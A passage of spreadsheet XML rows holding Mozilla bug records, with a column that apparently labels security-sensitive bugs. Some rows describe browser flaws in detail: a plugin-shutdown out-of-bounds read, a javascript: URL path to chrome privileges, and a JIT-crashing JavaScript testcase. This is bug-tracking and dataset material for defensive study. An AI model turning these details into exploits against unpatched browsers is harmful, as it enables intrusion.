This bug is for the second part.
What happens is this:
- PluginModuleParent::NP_Shutdown() gets called from nsNPAPIPlugin::Shutdown()
- The plugin process crashes whilst the browser is inside PPluginModuleParent::CallNP_Shutdown(), which returns false.
- PluginModuleParent::DoShutdown() calls Close(), which results in PluginModuleChromeParent::ActorDestroy() being called from inside PPluginModuleParent::OnChannelError().
- ActorDestroy() sets mShutdown to true.
- CrashReporterParent is destroyed inside PPluginModuleParent::OnChannelError()
- The stack unwinds, and then PluginModuleParent::DoShutdown() sets mShutdown to false (the return value of CallNP_Shutdown).
- PluginModuleParent::NP_Shutdown() is called again from nsNPAPIPlugin's destructor.
- Because mShutdown was reset to false, it calls DoShutdown() again, which results in ActorDestroy() being called for a second time.
- Because CrashReporterParent has already been destroyed, it results in an out-of-bounds read in PluginModuleChromeParent::CrashReporter().</t>
        </is>
      </c>
      <c r="X4832" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4833">
      <c r="A4833" t="n">
        <v>758344</v>
      </c>
      <c r="B4833" t="inlineStr">
        <is>
          <t>2012-05-24 12:58:16 -0700</t>
        </is>
      </c>
      <c r="C4833" t="inlineStr">
        <is>
          <t>Arbitrary code execution using javascript: url</t>
        </is>
      </c>
      <c r="D4833" t="inlineStr">
        <is>
          <t>2012-07-20 18:02:34 -0700</t>
        </is>
      </c>
      <c r="E4833" t="n">
        <v>1</v>
      </c>
      <c r="F4833" t="n">
        <v>1</v>
      </c>
      <c r="G4833" t="n">
        <v>3</v>
      </c>
      <c r="H4833" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4833" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4833" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4833" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4833" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4833" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4833" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4833" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4833" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q4833" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4833" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4833" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4833" t="n">
        <v>1</v>
      </c>
      <c r="U4833" t="n">
        <v>0</v>
      </c>
      <c r="V4833" t="n">
        <v>39</v>
      </c>
      <c r="W4833" t="inlineStr">
        <is>
          <t>When javascript: url is evaluated using a sandbox, it's possible to run arbitrary code with the chrome privileges.
In xpc_EvalInSandbox, when calling JS_ValueToString(sandcx-&gt;GetJSContext(), v), nsScriptSecurityManager::GetPrincipalAndFrame returns null (which is treated as the system principal) since there is no frame nor clamped principal and GetScriptContextPrincipalFromJSContext(cx) returns null.</t>
        </is>
      </c>
      <c r="X4833" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4834">
      <c r="A4834" t="n">
        <v>1825569</v>
      </c>
      <c r="B4834" t="inlineStr">
        <is>
          <t>2023-03-30 08:22:13 -0700</t>
        </is>
      </c>
      <c r="C4834" t="inlineStr">
        <is>
          <t>[tsan] data races in Android font backend (FT2FontEntry)</t>
        </is>
      </c>
      <c r="D4834" t="inlineStr">
        <is>
          <t>2023-10-17 20:43:55 -0700</t>
        </is>
      </c>
      <c r="E4834" t="n">
        <v>1</v>
      </c>
      <c r="F4834" t="n">
        <v>1</v>
      </c>
      <c r="G4834" t="n">
        <v>3</v>
      </c>
      <c r="H4834" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4834" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4834" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K4834" t="inlineStr">
        <is>
          <t>Firefox 113</t>
        </is>
      </c>
      <c r="L4834" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4834" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4834" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4834" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4834" t="inlineStr">
        <is>
          <t>[adv-main112+]</t>
        </is>
      </c>
      <c r="Q4834" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4834" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4834" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T4834" t="n">
        <v>1</v>
      </c>
      <c r="U4834" t="n">
        <v>0</v>
      </c>
      <c r="V4834" t="n">
        <v>16</v>
      </c>
      <c r="W4834" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1824200 +++
Although we don't have tsan reports from Android, or known crashes occurring, examination of the Android font backend shows that it has similar data-race issues to those fixed for Linux in bug 1824200.
Therefore, I propose to apply equivalent fixes to the gfxFT2FontList backend, and I think we should uplift them so that the Android fix ships at the same time as the Linux one.
(I guess it's possible that currently-unexplained crashes such as bug 1825417 could be related to the potential data races here, though we don't have direct evidence of that for now.)</t>
        </is>
      </c>
      <c r="X4834" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4835">
      <c r="A4835" t="n">
        <v>28927</v>
      </c>
      <c r="B4835" t="inlineStr">
        <is>
          <t>2000-02-23 00:38:32 -0800</t>
        </is>
      </c>
      <c r="C4835" t="inlineStr">
        <is>
          <t>Double-clicking on a twisty in sidebar loads bookmarks.xul into content area, or crashes</t>
        </is>
      </c>
      <c r="D4835" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E4835" t="n">
        <v>1</v>
      </c>
      <c r="F4835" t="n">
        <v>1</v>
      </c>
      <c r="G4835" t="n">
        <v>2</v>
      </c>
      <c r="H4835" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4835" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J4835" t="inlineStr">
        <is>
          <t>Sidebar</t>
        </is>
      </c>
      <c r="K4835" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4835" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4835" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N4835" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4835" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4835" t="inlineStr"/>
      <c r="Q4835" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4835" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4835" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4835" t="n">
        <v>1</v>
      </c>
      <c r="U4835" t="n">
        <v>0</v>
      </c>
      <c r="V4835" t="n">
        <v>8</v>
      </c>
      <c r="W4835" t="inlineStr">
        <is>
          <t>By mistake, I double-clicked a few times on a twisty in the bookmark's sidebar 
panel (I meant to double-click on the bookmark itself, but was a few pixels 
off).  What ended up happening was that bookmarks.xul was loaded into the 
content area of the browser window... a few more extra double-clicks caused us 
to crash.
This is on my Win98 box, not sure what happens on other platforms.
David, any idea on this?</t>
        </is>
      </c>
      <c r="X4835" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4836">
      <c r="A4836" t="n">
        <v>453526</v>
      </c>
      <c r="B4836" t="inlineStr">
        <is>
          <t>2008-09-03 14:11:56 -0700</t>
        </is>
      </c>
      <c r="C4836" t="inlineStr">
        <is>
          <t>Remaining attack vectors in feed preview on 1.8 branch</t>
        </is>
      </c>
      <c r="D4836" t="inlineStr">
        <is>
          <t>2018-12-20 14:42:01 -0800</t>
        </is>
      </c>
      <c r="E4836" t="n">
        <v>1</v>
      </c>
      <c r="F4836" t="n">
        <v>1</v>
      </c>
      <c r="G4836" t="n">
        <v>6</v>
      </c>
      <c r="H4836" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4836" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J4836" t="inlineStr">
        <is>
          <t>RSS Discovery and Preview</t>
        </is>
      </c>
      <c r="K4836" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L4836" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4836" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4836" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4836" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4836" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q4836" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4836" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4836" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4836" t="n">
        <v>1</v>
      </c>
      <c r="U4836" t="n">
        <v>0</v>
      </c>
      <c r="V4836" t="n">
        <v>12</v>
      </c>
      <c r="W4836" t="inlineStr">
        <is>
          <t>See bug 360529 comment 68 and bug 360529 comment 69.</t>
        </is>
      </c>
      <c r="X4836" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4837">
      <c r="A4837" t="n">
        <v>1367531</v>
      </c>
      <c r="B4837" t="inlineStr">
        <is>
          <t>2017-05-24 12:38:53 -0700</t>
        </is>
      </c>
      <c r="C4837" t="inlineStr">
        <is>
          <t>CSP frame-ancestors should not compare paths per CSP-3</t>
        </is>
      </c>
      <c r="D4837" t="inlineStr">
        <is>
          <t>2024-05-30 09:33:46 -0700</t>
        </is>
      </c>
      <c r="E4837" t="n">
        <v>1</v>
      </c>
      <c r="F4837" t="n">
        <v>1</v>
      </c>
      <c r="G4837" t="n">
        <v>3</v>
      </c>
      <c r="H4837" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4837" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4837" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K4837" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4837" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4837" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4837" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4837" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4837" t="inlineStr">
        <is>
          <t>[domsecurity-active][adv-main55+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4837" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4837" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4837" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T4837" t="n">
        <v>1</v>
      </c>
      <c r="U4837" t="n">
        <v>0</v>
      </c>
      <c r="V4837" t="n">
        <v>20</v>
      </c>
      <c r="W4837" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1364859 +++
See bug 1364859 comment 5 and bug 1364859 comment 9: Firefox accepts origins with paths in frame-ancestors and compares against those paths. This is actually correct according to CSP-2 if you follow the definitions of host-source, but I don't think that was intentional: frame-ancestors was intended to be a "better  X-Frame-Options" which operates only on origins.
This creates a cross-origin info leak, though, and in the latest CSP spec frame-ancestors is explicitly defined as being only origin-based</t>
        </is>
      </c>
      <c r="X4837" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4838">
      <c r="A4838" t="n">
        <v>1450032</v>
      </c>
      <c r="B4838" t="inlineStr">
        <is>
          <t>2018-03-29 10:47:54 -0700</t>
        </is>
      </c>
      <c r="C4838" t="inlineStr">
        <is>
          <t>Convert bottom (secondary) nav bar to ReactJS</t>
        </is>
      </c>
      <c r="D4838" t="inlineStr">
        <is>
          <t>2018-08-28 10:15:28 -0700</t>
        </is>
      </c>
      <c r="E4838" t="n">
        <v>1</v>
      </c>
      <c r="F4838" t="n">
        <v>1</v>
      </c>
      <c r="G4838" t="n">
        <v>7</v>
      </c>
      <c r="H4838" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4838" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4838" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K4838" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4838" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4838" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4838" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4838" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4838" t="inlineStr"/>
      <c r="Q4838" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4838" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4838" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4838" t="n">
        <v>1</v>
      </c>
      <c r="U4838" t="n">
        <v>0</v>
      </c>
      <c r="V4838" t="n">
        <v>5</v>
      </c>
      <c r="W4838" t="inlineStr">
        <is>
          <t>Part of the overall conversion to ReactJS.
Estimated difficulty of 6</t>
        </is>
      </c>
      <c r="X4838" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4839">
      <c r="A4839" t="n">
        <v>1442210</v>
      </c>
      <c r="B4839" t="inlineStr">
        <is>
          <t>2018-03-01 03:53:01 -0800</t>
        </is>
      </c>
      <c r="C4839" t="inlineStr">
        <is>
          <t>'Trigger missing jobs' broken: TypeError: this.ThResultSetModel is undefined</t>
        </is>
      </c>
      <c r="D4839" t="inlineStr">
        <is>
          <t>2018-03-01 09:44:05 -0800</t>
        </is>
      </c>
      <c r="E4839" t="n">
        <v>1</v>
      </c>
      <c r="F4839" t="n">
        <v>1</v>
      </c>
      <c r="G4839" t="n">
        <v>7</v>
      </c>
      <c r="H4839" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4839" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4839" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K4839" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4839" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4839" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4839" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4839" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4839" t="inlineStr"/>
      <c r="Q4839" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4839" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4839" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4839" t="n">
        <v>1</v>
      </c>
      <c r="U4839" t="n">
        <v>0</v>
      </c>
      <c r="V4839" t="n">
        <v>5</v>
      </c>
      <c r="W4839" t="inlineStr">
        <is>
          <t>The "trigger missing jobs" menu item is broken.
Steps to reproduce:
1. Open https://treeherder.mozilla.org/#/jobs?repo=mozilla-inbound&amp;revision=0e7140a7c841c3b74b70d050636a01b9d4619b56&amp;filter-resultStatus=testfailed&amp;filter-resultStatus=busted&amp;filter-resultStatus=exception&amp;filter-resultStatus=retry&amp;filter-resultStatus=usercancel&amp;filter-resultStatus=runnable
2. Open the menu for the push on the right.
3. Click on 'Trigger missing jobs'.
Actual result: no confirmation and missing jobs not added
Expected result: confirmation that request to run missing jobs has been sent to the server, missing jobs added
From the console:
TypeError
​
columnNumber: 155860
​
fileName: "https://treeherder.mozilla.org/index.10e1584401e22240f319.bundle.js"
​
lineNumber: 39
​
message: "this.ThResultSetModel is undefined"
​
stack: "triggerMissingJobs/&lt;@https://treeherder.mozilla.org/index.10e1584401e22240f319.bundle.js:39:155860\nprocessQueue@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:410264\nscheduleProcessQueue/&lt;@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:410930\n$digest@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:418440\n$apply@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:420551\nscheduleApplyAsync/vo&lt;@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:415679\ncompleteOutstandingRequest@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:348446\nBrowser/ko.defer/Fo&lt;@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:350364\nsetTimeout handler*Browser/ko.defer@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:350336\nscheduleApplyAsync@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:415659\n$applyAsync@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:420678\ndone@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:387086\ncompleteRequest@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:390733\ncreateHttpBackend/&lt;/Mo.onload@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:391251\nEventHandlerNonNull*createHttpBackend/&lt;@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:391065\nsendReq@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:388451\n$http/Mo&lt;@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:386497\nprocessQueue@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:410264\nscheduleProcessQueue/&lt;@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:410930\n$digest@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:418440\n$evalAsync/&lt;@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:420332\ncompleteOutstandingRequest@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:348446\nBrowser/ko.defer/Fo&lt;@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:350364\nsetTimeout handler*Browser/ko.defer@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:350336\n$evalAsync@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:420301\n$QProvider/this.$get&lt;/&lt;@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:409386\nscheduleProcessQueue@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:410916\nthen@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:412775\n$http@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:386188\n$HttpProvider/this.$get&lt;/&lt;/&lt;/$http[Do]@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:389468\nA.get@https://treeherder.mozilla.org/index.10e1584401e22240f319.bundle.js:13:329483\nLe@https://treeherder.mozilla.org/index.10e1584401e22240f319.bundle.js:39:216432\ntriggerMissingJobs@https://treeherder.mozilla.org/index.10e1584401e22240f319.bundle.js:39:155791\nonClick@https://treeherder.mozilla.org/index.10e1584401e22240f319.bundle.js:39:157801\nJa@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:1113\ninvokeGuardedCallback@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:71470\ninvokeGuardedCallbackAndCatchFirstError@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:71548\nZa@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:2182\ncb@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:2684\ngb@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:2890\nab@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:2487\nlb@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:3638\nRn@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:83177\nrd@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:12599\nbatchedUpdates@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:52798\ntc@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:8117\nvd@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:13092\nEventListener.handleEvent*listen@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:41:319983\nU@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:12711\nlg@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:60681\npg@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:62314\nfinalizeInitialChildren@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:94069\ncompleteWork@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:37148\nc@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:46285\nd@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:47106\nf@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:47423\ng@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:47691\nm@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:51504\nw@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:51287\nz@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:50316\nu@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:49661\nupdateContainer@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:54291\nPg/&lt;@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:66601\nunbatchedUpdates@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:52924\nPg@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:66570\nrender@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:48:96948\nrenderComponent/&lt;@https://treeherder.mozilla.org/index.10e1584401e22240f319.bundle.js:39:335572\n$digest@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:418440\n$apply@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:420551\nko/&lt;@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:332016\ninvoke@https://treeherder.mozilla.org/vendor.3e5c3f8b422f87cd7d81.bundle.js:36:345473\n"
​
__proto__: Object { stack: "", … }
 Possibly unhandled rejection: {}</t>
        </is>
      </c>
      <c r="X4839" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4840">
      <c r="A4840" t="n">
        <v>986678</v>
      </c>
      <c r="B4840" t="inlineStr">
        <is>
          <t>2014-03-21 14:15:41 -0700</t>
        </is>
      </c>
      <c r="C4840" t="inlineStr">
        <is>
          <t>Assertion failure: MIR instruction returned value with unexpected type, at jit/IonMacroAssembler.cpp</t>
        </is>
      </c>
      <c r="D4840" t="inlineStr">
        <is>
          <t>2015-08-30 12:00:44 -0700</t>
        </is>
      </c>
      <c r="E4840" t="n">
        <v>1</v>
      </c>
      <c r="F4840" t="n">
        <v>1</v>
      </c>
      <c r="G4840" t="n">
        <v>3</v>
      </c>
      <c r="H4840" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4840" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4840" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K4840" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4840" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4840" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4840" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4840" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4840" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main29+][adv-esr24.5+]</t>
        </is>
      </c>
      <c r="Q4840" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4840" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4840" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T4840" t="n">
        <v>1</v>
      </c>
      <c r="U4840" t="n">
        <v>0</v>
      </c>
      <c r="V4840" t="n">
        <v>14</v>
      </c>
      <c r="W4840" t="inlineStr">
        <is>
          <t>Created attachment 8395043
stack
function g(x) {
    return a = Math ? x : 0
}
function f() {
    ({} &gt; g()), g(Math.round())
}
try {
    f()
} catch (e) {}
g = (function() {
    return 0
})
f()
f()
asserts js debug shell on m-c changeset 199e65efd08b with --ion-parallel-compile=off --ion-eager at Assertion failure: MIR instruction returned value with unexpected type, at jit/IonMacroAssembler.cpp
s-s because this seems to be a Mid-Level Intermediate Representation issue, js folks say keep it s-s by default for now.
My configure flags are:
LD=ld CROSS_COMPILE=1 CC="clang -Qunused-arguments -arch i386" RANLIB=ranlib CXX="clang++ -Qunused-arguments -arch i386" AS=$CC AR=ar STRIP="strip -x -S" HOST_CC="clang -Qunused-arguments" HOST_CXX="clang++ -Qunused-arguments" sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=i386-apple-darwin9.2.0 --enable-macos-target=10.5 --enable-optimize --enable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --disable-tests --enable-more-deterministic --with-ccache --enable-threadsafe &lt;other NSPR options&gt;
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   http://hg.mozilla.org/mozilla-central/rev/1b91cf5c8407
user:        Jan de Mooij
date:        Sat Dec 14 14:32:35 2013 +0100
summary:     Bug 949475 - Add some debug-only sanity checks. r=bhackett
Jan, perhaps bug 949475 caused a latent bug to show up?</t>
        </is>
      </c>
      <c r="X4840" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4841">
      <c r="A4841" t="n">
        <v>1073577</v>
      </c>
      <c r="B4841" t="inlineStr">
        <is>
          <t>2014-09-26 09:04:23 -0700</t>
        </is>
      </c>
      <c r="C4841" t="inlineStr">
        <is>
          <t>Objects can be put into the wrong entry in the new object cache after a minor GC</t>
        </is>
      </c>
      <c r="D4841" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:27 -0700</t>
        </is>
      </c>
      <c r="E4841" t="n">
        <v>1</v>
      </c>
      <c r="F4841" t="n">
        <v>1</v>
      </c>
      <c r="G4841" t="n">
        <v>3</v>
      </c>
      <c r="H4841" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4841" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4841" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K4841" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4841" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4841" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4841" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4841" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4841" t="inlineStr">
        <is>
          <t>[adv-main34+]</t>
        </is>
      </c>
      <c r="Q4841" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4841" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4841" t="inlineStr">
        <is>
